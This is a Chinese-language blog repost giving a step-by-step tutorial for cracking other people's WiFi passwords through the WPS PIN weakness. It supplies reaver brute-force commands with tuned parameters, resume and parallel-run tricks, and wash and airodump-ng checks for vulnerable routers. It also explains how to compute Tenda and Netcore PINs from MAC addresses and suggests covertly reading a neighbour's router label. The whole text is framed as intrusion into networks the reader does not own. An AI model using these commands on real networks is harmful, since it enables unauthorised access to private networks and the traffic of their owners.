Wifi密码破解之二：利用wps漏洞穷举PIN码破解wifi密码

转自：http://xiao106347.blog.163.com/blog/static/21599207820136161132836/

 
得到PIN码,怎么破解路由的密码呢?Linux系统下我们可以使用 Reaver 软件破解出路由的密码；下图是通过路由器的PIN码得到wifi密码的效果图:
已知PIN码是   49312119
破解出密码是   #$%19283746

 

和暴力破解密码相比，利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件，而且就算wifi主人修改密码,只要不更换pin码，也可以很快再次得到密码，但是必须要路由支持并开启WPS功能；如何得到路由的PIN 码呢？

1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令：

         reaver -i mon0 -b mac -S -v -n

reaver命令参数(转):

• -i 监听后接口名称
• -b 目标mac地址
• -a 自动检测目标AP最佳配置
• -S 使用最小的DH key（可以提高PJ速度）
• -vv 显示更多的非严重警告
• -d  即delay每穷举一次的闲置时间 预设为1秒
• -t  即timeout每次穷举等待反馈的最长时间
• -c  指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 （非TP-LINK路由推荐–d9 –t9  参数防止路由僵死

示例：

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv）

应因状况调整参数（-c后面都已目标频道为1作为例子）

目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1

目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1

目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

一个穷举过程：

 

在穷举的过程种reaver会生成以路由mac地址为名的wpc文件,一时半会pin不出来，第二天pin的时候命令加参数 -s file.wpc继续pin；或者多开几个终端窗口每个窗口都从不同的数字段开始pin，这样提高效率但也容易漏pin，比如   reaver -i mon0 -b mac -S -v -n -p 9000（窗口1）      reaver -i mon0 -b mac -S -v -n -p 8000 （窗口2） 。。。。。。最后得到pin码和psk 码（也就是密码），如果以后人家修给密码，只要不关闭wps功能就可以用reaver -i mon0 -b mac -p xxxxxxxx来再次得到密码。

一段时间过后，穷举出密码：

 

这样pin也是有限制的，比如要被pin出的路由器必须得开启wps功能；貌似现在很多都是防pin路由器或300秒pin限制的。

 

判断一个wifi信号是否开启了wps可以被探测出pin码，可以用airodump-ng命令或wash命令检测：

         1）.airodump-ng：MB项的那个54e.和54e，是54e.的就可以探测pin

 

     2）.wash -i mon0 -C：wps locked的那个项，YES的就可以被探测pin

 
利用wps漏洞破解wifi密码的软件还有wifite,bully等（具体看日志末尾的推荐阅读）.

2.特殊路由的pin码可以通过计算得出

       有些路由pin码可以通过计算得到：腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。

比如这个：bssid ：Tenda_579A18    mac ：C8:3A:35:57:9A:18  通过计算器将mac后6位换算成10进制数，得到5741080（pin码的前7位）,最多试10次或通过软件得到该路由pin码！

 

当然还有腾达路由pin码计算器软件：

 

 

3.当然也可以假装干其他事，去人家看一下路由底部的pin码什么的。。。